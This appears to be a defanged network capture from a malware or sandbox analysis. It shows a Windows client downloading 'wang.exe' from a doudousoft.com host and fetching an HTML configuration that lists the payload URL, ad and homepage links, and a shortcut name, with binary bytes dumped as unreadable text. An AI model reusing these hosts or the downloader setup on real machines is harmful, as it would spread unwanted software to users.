02:54:04 GMT..Accept-Ranges: bytes..ETag: "af2c7ef4d9e1cf1:509e"..Server: IIS..X-Powered-By: WAF/2.0.....(.]..2......M.......M.......P.].........u........M..C....M............].
<<< skipped >>>
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1030552-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:51 GMT
Content-Length: 1545832
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 1030552-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
@n...4...f=?Y.V.|.~6..b.)|N.\...:%,ÿ........VR&.'.<...^..6...2....... P~.Q.jt....&.......m....nH.....Uf.n.^...S.S..!6maw5..?......v.c..<3...Eu;V...m~..m..Y6..F"..~.R..nn ..D...L@j....7$....)j.C.._.N..>..Q3.....$r..N.......`f........>....ON..F. ...(u...........S....d....sF.....T..^"D\......:......2,..$..@..M.o.^._.....G.V.:c@8.?G.^..R..n=.@G"......J...D.J..e...].....?1`........3... .nF.[.V........Od.|.v....h.@".?_4.)i.w.......^F.^.......Bn.j...M.b...Cv..jF.~...I...Q&v.]..'a.P..l..Z....s.'.B9..%h.jZ......m..._|.....>......%......M.a..F~.b@...-V#.X..w.I.V...7..K../......W..A...-0RI.H..b~..A/.&f..K..[.r~ ....B.&...}.p ..'...Z.O._.(XGS.j.....U......7&...5E?..?.m..8v'[Z....Dip..>BnR./.aH.\........Ajf.!...'.(^^|Vh.'...:......_..S....DYx$4....... w.?...b.......v.......FAf...e.a.N5.........>.-...c.K64.! 7......7'._o.E4^F.k.z.....f\4.-....\...!b...^.;xY....%.>............$........(..I....`.......Y...2..s..#.A....Yv.......n.........0>......V...........!.j..V.../>.T.......K^.:...a.......?OF....~..'\.....W..k............7....K.S../\T...@UOCJ'6.O..v.....]#"...O.]..u.Ed..[.=6.C........V...;..n.j..P.H....\5.?V.....A..>.~..........~..:DNq......F?:.....?.....7.6...Z..oFH.$/[...[....7... zT.4'.uG9.X...^w...`>Y.i....O~....sV..^y^...^#.>....3.GXG.Vzf...E..N.....~'....o..x3)6%.E.....^o....dT@........z....?^..!...jp..{NE.V.V..)a.6....x...@.o.=o<.....j.b.E....m.I.... G....E.A.<Bi...H."..N..!C^..sT....'...9...% hAC....0._.}.a..5....>.}...LT.KW../....@..e.'n ..A..jh...L.....o...@s.T.c..i
<<< skipped >>>
GET /ini/liuliang/wang.html HTTP/1.1
Referer: hXXp://56.doudousoft.com/ini/liuliang/wang.html
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 56.doudousoft.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 23 Jul 2015 08:08:17 GMT
Content-Length: 1394
Content-Type: text/html
Content-Location: hXXp://56.doudousoft.com/ini/liuliang/wang.html
Last-Modified: Mon, 09 Feb 2015 08:25:13 GMT
Accept-Ranges: bytes
ETag: "2ac01bed4144d01:509e"
Server: IIS
X-Powered-By: WAF/2.0
Set-Cookie: safedog-flow-item=04BB3AA94037E5C323362778CE366DBD; expires=Thur, 23-Jul-2015 16:00:17 GMT; domain=doudousoft.com; path=/
[........]XXXX[/........]<br>..[............]..[/............]<br>..[........]5000[/........]<br>..[............]..[/............]<br>..[........]hXXp://56.doudousoft.com/updata/......../wang.exe[/........]<br>..[............]wang.exe[/............]<br>..[......]..........BUG..[/......]<br>..[..........].........html[/..........]<br>..[............]..[/............]<br>..[........]hXXp://VVV.shendusoft.com[/........]<br>..[..............]..[/..............]<br>..[..........]hXXp://56.doudousoft.com/guanggao.html[/..........]<br>..[..................]..[/..................]<br>..[..............]hXXp://u.126it.com[/..............]<br>..[................]..[/................]<br>..[............]hXXp://VVV.2345.com/?26263[/............]<br>..[....................]..[/....................]<br>..[................]hXXp://VVV.2345.com/?26263[/................]<br>..[................]2345.........lnk[/................]<br>..<script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " hXXps://" : " hXXp://");document.write(unescape("